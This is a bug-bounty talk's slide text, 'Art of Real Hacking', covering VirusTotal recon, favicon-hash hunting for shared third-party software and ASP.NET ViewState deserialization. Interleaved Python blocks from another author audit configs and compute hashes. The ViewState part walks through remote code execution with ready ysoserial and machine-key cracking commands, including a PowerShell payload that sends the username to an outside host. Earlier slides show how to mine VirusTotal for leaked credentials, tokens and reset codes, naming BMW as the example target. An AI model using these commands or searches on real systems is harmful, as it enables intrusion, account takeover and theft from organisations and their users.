ART OF REAL HACKING
$cat orwa
● Orwa Godfather (Orwa Atyat)
● Full Time Bug Hunter / Security Researcher
● Bugcrowd Security Researcher / Content Creator / Collaborator / Top 50 BC / Top 3 P1s
● 1000+ Bugs Submitted (Critical/High)
● 15+ 0days/CVEs
● Traveler / Gamer / Cook
ART OF
● VirusTotal Hacking
● Zero-Day Hacking
● Machine Keys & ViewState Deserialization Hacking
VirusTotal Hacking
Via VirusTotal hacking you can find:
● IPs / origin IPs
● Unique endpoints
● Unique subdomains / open ports
● Credentials
● Tokens
What is VirusTotal
VirusTotal is a popular online service that analyzes files and URLs for potential viruses,
malware, and other threats. It aggregates results from various antivirus engines and
website scanners to give users a comprehensive report on the safety of a file or website
endpoint.
VirusTotal inspects items with over 70 antivirus scanners and URL/domain blocklisting
services, in addition to a variety of tools.
Website endpoints, and internal endpoints / IPs, get archived on VirusTotal
via user submission, automated crawling, analysis reports, etc.
Usual Method
Upload the file, or copy the URL, or search, and then start scanning.
Orwa Method
Manually extract, or use a private ./script to extract.
Discovering:
https://www.virustotal.com/vtapi/v2/domain/report?apikey={APIKEY}&domain={DOMAIN}
EX:
https://www.virustotal.com/vtapi/v2/domain/report?apikey=XXXX&domain=www.bmw.com
Orwa Method: Manually Extract
Subdomains
https://www.virustotal.com/vtapi/v2/domain/report?apikey=XXXX&domain=www.bmw.com
IPs
https://www.virustotal.com/vtapi/v2/domain/report?apikey=XXXX&domain=www.bmw.com
Endpoints
https://www.virustotal.com/vtapi/v2/domain/report?apikey=XXXX&domain=www.bmw.com
Credentials
Scenarios Of P1/P2 Bugs
Information Disclosure Endpoints (jpg, png, pdf in financial web apps)
Information Disclosure Endpoints (voucher codes / gift cards)
Information Disclosure Endpoints (txt / xml / php / etc.)
Email/User:Password Endpoints (clear text or encoded)
Tokens / API Keys / etc. (ATO [reset password / create account])
Unauthorized Access Endpoints
Backup Files (.iso / .exe / .zip / .7z / .tar / .gz / .dll)
Unauthorized Access (Unique Open Ports)
Finding Origin IPs More Than Any Other Resource
Keyword Tips To Search (CTRL+F):
.zip / .7z / .exe / .tar / .gz / .dll / .iso (backup files)
token= | apikey= | /resetpassword/ | registration
== (encoded creds) | .com: | @ | code=
.aspx | .ashx | .php | .jsp | .cgi | .xml | .txt | .xhtml
Tip
Remember: search for subdomains one by one.
EX: the results when you search uat-dev.orwa.com are not the same as for uat1-dev.orwa.com.
Orwa Method
Private ./script for extract:
https://github.com/orwagodfather/virustotalx
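The domain report returned by the URL above is JSON. This added example (mine, not the speaker's virustotalx script) shows how a security team can pull the subdomains, resolved IPs and archived URLs out of such a report for its own domain and label the keyword classes from the CTRL+F tips, grouped per host so each subdomain is reviewed on its own. The report shape is the v2 domain report as I know it, and the sample report is constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Keyword classes from the CTRL+F tips above, as regexes run over the archived URLs.
SENSITIVE_PATTERNS = {
    "backup file": re.compile(r"\.(zip|7z|exe|tar|gz|dll|iso)(\?|$)", re.I),
    "token / key / code parameter": re.compile(r"(token|apikey|code)=", re.I),
    "password reset / registration": re.compile(r"resetpassword|registration", re.I),
    "possible credentials": re.compile(r"==|@|\.com:"),
}

def extract_assets(report: dict) -> dict:
    """Pull subdomains, resolved IPs and archived URLs out of a v2 domain report (already parsed JSON)."""
    urls = [d["url"] for d in report.get("detected_urls", [])]
    urls += [row[0] for row in report.get("undetected_urls", [])]  # these rows are lists, URL first
    return {
        "subdomains": sorted(set(report.get("subdomains", []))),
        "ips": sorted({r["ip_address"] for r in report.get("resolutions", [])}),
        "urls": sorted(set(urls)),
    }

def flag_sensitive_urls(urls) -> dict:
    """Group URLs per host (the tip: review each subdomain on its own) and label keyword hits."""
    hits = defaultdict(list)
    for url in urls:
        host = urlparse(url).hostname or "?"
        labels = [name for name, pat in SENSITIVE_PATTERNS.items() if pat.search(url)]
        if labels:
            hits[host].append((url, labels))
    return dict(hits)

# Constructed sample shaped like a v2 domain report (only the fields read above; values made up).
SAMPLE_REPORT = {
    "subdomains": ["uat-dev.example.com", "api.example.com"],
    "resolutions": [{"ip_address": "203.0.113.10", "last_resolved": "2023-01-01 00:00:00"},
                    {"ip_address": "203.0.113.11", "last_resolved": "2023-02-01 00:00:00"}],
    "detected_urls": [{"url": "https://api.example.com/v1/users?apikey=abcd1234",
                       "positives": 1, "total": 70, "scan_date": "2023-03-01 00:00:00"}],
    "undetected_urls": [
        ["https://uat-dev.example.com/backups/site.7z", "sha256-placeholder", 0, 70, "2023-03-01 00:00:00"],
        ["https://www.example.com/account/resetpassword/?code=9f8e7d", "sha256-placeholder", 0, 70, "2023-03-02 00:00:00"],
        ["https://www.example.com/index.html", "sha256-placeholder", 0, 70, "2023-03-03 00:00:00"],
    ],
}

if __name__ == "__main__":
    for host, items in flag_sensitive_urls(extract_assets(SAMPLE_REPORT)["urls"]).items():
        print(host, items)
```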
Critical Reports 1 (PII)
Critical Reports 2 (PII)
Critical Reports 3
Critical Reports
Other Ex:
app/virustotal-endpoint/backup.7z ===> RCE P1 20K$
app/virustotal-endpoint/actuator ===> P1 2,100$
app/virustotal-endpoint/virustotal-param= LFI ===> P1 2,100$
app/resetpassword/virustotal-code ===> ATO 15K$
Zero-Day Hacking
What is a Zero-day?
A zero-day is a vulnerability in software or hardware that is
typically unknown to the vendor and for which no patch or other
fix is available.
Here we talk about software (installed apps or third-party / 3rd-party services).
Third Party Ex:
company.3rd-party.com
or
3rd-party.company.com
Ex:
bmw.okta.com
bmw.servicenow.com
bmw.jfrog.io
okta.bmw.com
servicenow.bmw.com
github.bmw.com
To Get A Zero-day
● 1) You have to find the software / installed app / 3rd party.
● 2) You have to start recon about the software / installed app / 3rd party.
● 3) You have to find a bug in the software / installed app / 3rd party.
● 4) You have to test the same bug on more than 2 companies
that use the software / installed app / 3rd party.
Third Party:
To find on urlscan ⇒ bmw.* -xxx (use -xxx to remove anything from the results)
Third Party: bmw-*
Software / installed apps via favicon hash:
Find the software from favicon.ico
What Are Favicons?
On most modern browsers, whenever you open a webpage, a small icon
appears on the top left corner, right before the title. That is what we call a
favicon.
Check favicons via the httpx tool:
$ cat subs.txt | httpx -path /favicon.ico -mc 200 -o live-favicon.txt
Tip
In some web apps (about 30%) the favicon uses another name,
so you manually have to view the source and search for
(.ico) or (favicon) or (icon).
How To Find The Hash Of A Favicon?
There are many methods, but my favourite is
https://favicon-hash.kmsec.uk/
You can also use a ready-made tool for that, such as
https://github.com/devanshbatham/FavFreak
How To Find Assets Using Favicon Hashes?
FIS Real Ex:
favicon_hash=-1884333011
md5=a5884f3c9934cffb01a73a9ea71151a7
FIS Real Ex (use the MD5 on Censys):
Visit: https://search.censys.io/
Dork: services.http.response.favicons.md5_hash:XXXXXXXXXXX
FIS Real Ex (favicon hash on Shodan):
Visit: https://www.shodan.io/
Dork: http.favicon.hash:XXX
FIS Real Ex (favicon hash on ZoomEye):
Visit: https://www.zoomeye.hk/
Dork: iconhash:"xxxxxx"
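The two dork values above are derived from the icon bytes. This added example (mine, not from the talk or from FavFreak) reimplements the hash behind Shodan's http.favicon.hash, which is MurmurHash3 over the base64 text including its line breaks, plus the MD5 Censys indexes, so a team can fingerprint its own product's icon offline and search for every exposed instance. The murmur routine is pure Python to avoid the mmh3 dependency; that Censys' md5_hash is the plain MD5 of the raw bytes is my assumption.

```python
import base64
import hashlib

def _rotl32(x: int, r: int) -> int:
    return ((x << r) | (x >> (32 - r))) & 0xFFFFFFFF

def murmur3_32(data: bytes, seed: int = 0) -> int:
    """MurmurHash3 x86_32 in pure Python, returned as a signed int exactly like mmh3.hash()."""
    c1, c2 = 0xCC9E2D51, 0x1B873593
    h = seed & 0xFFFFFFFF
    nblocks = len(data) // 4
    for i in range(nblocks):  # body: 4-byte little-endian blocks
        k = int.from_bytes(data[4 * i:4 * i + 4], "little")
        k = (_rotl32((k * c1) & 0xFFFFFFFF, 15) * c2) & 0xFFFFFFFF
        h ^= k
        h = (_rotl32(h, 13) * 5 + 0xE6546B64) & 0xFFFFFFFF
    tail = data[4 * nblocks:]  # 0-3 trailing bytes
    k = 0
    for j in range(len(tail) - 1, -1, -1):
        k ^= tail[j] << (8 * j)
    if tail:
        h ^= (_rotl32((k * c1) & 0xFFFFFFFF, 15) * c2) & 0xFFFFFFFF
    h ^= len(data)  # finalisation mix
    h = ((h ^ (h >> 16)) * 0x85EBCA6B) & 0xFFFFFFFF
    h = ((h ^ (h >> 13)) * 0xC2B2AE35) & 0xFFFFFFFF
    h ^= h >> 16
    return h - 0x100000000 if h & 0x80000000 else h

def shodan_favicon_hash(favicon: bytes) -> int:
    """Shodan's http.favicon.hash: murmur3 over the base64 text *including* its 76-column newlines."""
    return murmur3_32(base64.encodebytes(favicon))

def censys_favicon_md5(favicon: bytes) -> str:
    """Assumed form of Censys' favicons.md5_hash: plain MD5 of the raw icon bytes."""
    return hashlib.md5(favicon).hexdigest()

def favicon_dorks(favicon: bytes) -> dict:
    """The ready-to-paste search strings from the slides for one icon."""
    return {"shodan": f"http.favicon.hash:{shodan_favicon_hash(favicon)}",
            "censys": f"services.http.response.favicons.md5_hash:{censys_favicon_md5(favicon)}"}

if __name__ == "__main__":
    sample_icon = b"\x00\x00\x01\x00" + b"\x00" * 12  # constructed stand-in for favicon.ico bytes
    print(favicon_dorks(sample_icon))
```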
Now we know what the software or 3rd party is.
What can we do to test?
● If our program's software is running behind a strong WAF, we
can start looking for the same software without a
WAF.
● We can collect the software's endpoints on other domains,
not our program's domain, and then test those endpoints
on our program's domain.
And then we can start testing...
What can we do to test?
Authentication bypass via cross-subdomain cookie reuse
&
Authentication bypass by bypassing registration restrictions
(HackerX007)
What can we do to test?
● Search for backup files of the software.
● Try to download and install the software.
● Try to look for the software's source on GitHub/GitLab.
And maybe you get lucky and find some perfect
endpoints to test,
or default credentials or API calls,
or a MachineKey in ASP.NET.
And from here let's start with an easy topic to understand: the
machine key and exploiting ViewState
deserialization.
Machine Keys & ViewState Deserialization Hacking
Here in this topic I will share:
● What the ViewState and machine key are
● How to find the ViewState and machine key
● Test cases
● An extension to find and test the ViewState
● Tools / (machine keys wordlist) to test the ViewState
● Example of a zero-day
What is ViewState ?
ViewState is the method that the ASP.NET framework uses by default to preserve
page and control values between web pages. When the HTML for the page is
rendered, the current state of the page and values that need to be retained during
postback are serialized into base64-encoded strings and output in the ViewState
hidden field or fields.
What is a Machine Key?
The MachineKey class provides methods that expose the hashing and
encryption logic that ASP.NET provides.
MachineKey is used for:
● ViewState encryption and validation
● Forms Authentication (or Federated Authentication), which uses this key for signing the
authentication ticket
ViewState values are signed (MAC) with the machine key so the server can
tell its own ViewState from a tampered one. If we know the machine key
used for the ViewState, we can use it to generate a
payload and get RCE, and that is the
deserialization vulnerability.
How to find the ViewState?
In any ASP.NET endpoint served by the server, such as
.asp / .aspx / .ashx / etc.
How to find the machine keys?
In the web.config file
(download the source of the software, or access web.config via LFI),
or via a machine key wordlist.
ViewState Ex:
Test Cases
(2) cases to test the ViewState deserialization:
● If the MAC is not enabled, we can start
exploiting directly without needing the machine key.
● If the MAC is enabled, we have to get the machine key;
in this case we can start testing a machine keys
wordlist,
or
try to download the software and look for web.config
in the software's source.
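The two cases above map directly onto settings in web.config. This added audit script (mine, not from the talk) parses a web.config and flags what makes each case exploitable: MAC disabled, a static key that may be the vendor's default shared by every customer, and a legacy validation algorithm. Both configs are constructed samples, and the default of HMACSHA256 for the validation attribute is assumed (ASP.NET 4.5+).

```python
import xml.etree.ElementTree as ET

# Constructed sample: a vendor-shipped web.config with the weaknesses the slides describe.
WEAK_CONFIG = """<configuration>
  <system.web>
    <pages enableViewStateMac="false" />
    <machineKey validationKey="0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF"
                decryptionKey="0123456789ABCDEF0123456789ABCDEF"
                validation="SHA1" decryption="AES" />
  </system.web>
</configuration>"""

# Constructed sample: the same section with MAC on, per-deployment keys and HMACSHA256.
HARDENED_CONFIG = """<configuration>
  <system.web>
    <pages enableViewStateMac="true" viewStateEncryptionMode="Always" />
    <machineKey validationKey="AutoGenerate,IsolateApps"
                decryptionKey="AutoGenerate,IsolateApps"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>"""

def audit_web_config(xml_text: str) -> list:
    """Return the ViewState/machineKey findings for one web.config (empty list = nothing flagged)."""
    findings = []
    root = ET.fromstring(xml_text)
    pages = root.find("system.web/pages")
    # Case 1 on the slides: MAC off means a forged serialized object is accepted without any key.
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        findings.append("enableViewStateMac=false: ViewState is accepted without a MAC")
    mk = root.find("system.web/machineKey")
    if mk is not None:
        # Case 2: a static key is only as secret as the file it lives in; a key copied from a
        # vendor's web.config is shared by every customer running that product.
        for attr in ("validationKey", "decryptionKey"):
            if not mk.get(attr, "AutoGenerate").startswith("AutoGenerate"):
                findings.append(f"static {attr}: must be unique per deployment, never the vendor default")
        # Assumed default for 'validation' is HMACSHA256; MD5/SHA1 are the legacy MAC algorithms.
        if mk.get("validation", "HMACSHA256").upper() in ("MD5", "SHA1"):
            findings.append(f"validation={mk.get('validation')}: use HMACSHA256 or stronger")
    return findings

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_web_config(cfg))
```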
Extension to find and test the viewstate
ViewState Editor Burp extension
ViewState Editor Burp extension ( Mac Enabled)
ViewState Editor Burp extension ( Mac is not enabled )
Tools / (machine keys wordlist) to test the ViewState
1) AspDotNetWrapper: this tool tests machine keys against a ViewState.
2) ysoserial: this tool generates a serialized payload.
Tip
If the MAC is not enabled, we can skip the first tool and start exploiting directly with ysoserial.
Tip 2
You have to test all ASPX endpoints, not just a single one,
mostly in bypass cases.
Exploiting (MAC is not enabled)
Simply use ysoserial to generate a serialized payload and send it
in a POST request to perform RCE.
EX (username command):
ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://burp-server/$env:UserName"
Next Step ⇒
Copy the payload and put it in the ViewState parameter value
(&__VIEWSTATE=payload), then send the request and check your Burp / server.
Exploiting (MAC enabled)
Download https://github.com/orwagodfather/AspDotNetWrapper-Edited-
(if you know the machine key, add it to the wordlist (MachineKeys.txt)),
then run the following command:
AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata <viewstate> --decrypt --purpose=viewstate --modifier=<__VIEWSTATEGENERATOR> --macdecode
Replace <viewstate> with the __VIEWSTATE parameter value from the source.
Replace <__VIEWSTATEGENERATOR> with the __VIEWSTATEGENERATOR parameter value from the source.
Exploiting (MAC enabled)
Keys not found: pass that.
If the key is found, the response will look like this ===>
What we need from here is the algorithm (HMACSHA256) and the value of
ValidationKey.
Exploiting (MAC enabled)
Next step: copy the ValidationKey and HMACSHA256, and in ysoserial run this command:
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "<Command>" --generator=<__VIEWSTATEGENERATOR> --validationalg="<Key_Type>" --validationkey="<validationkey>"
Replace <__VIEWSTATEGENERATOR> with the __VIEWSTATEGENERATOR parameter value from the source.
Replace <Key_Type> with HMACSHA256.
Replace <validationkey> with the ValidationKey value.
Ex (username command):
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://burp-server/$env:UserName" --generator=xxxxx --validationalg="HMACSHA256" --validationkey="xxxxxxxx"
Next Step ⇒
Copy the payload and put it in the ViewState parameter value
(&__VIEWSTATE=payload), then send the request and check your Burp / server.
Zero-Day! Example.
1) We found a software via checking the favicon hash.
2) We found the software's source backup via VirusTotal.
3) We found a machine key in the source's web.config file.
4) We tested that machine key on all clients.
And the result: an amazing RCE & zero-day.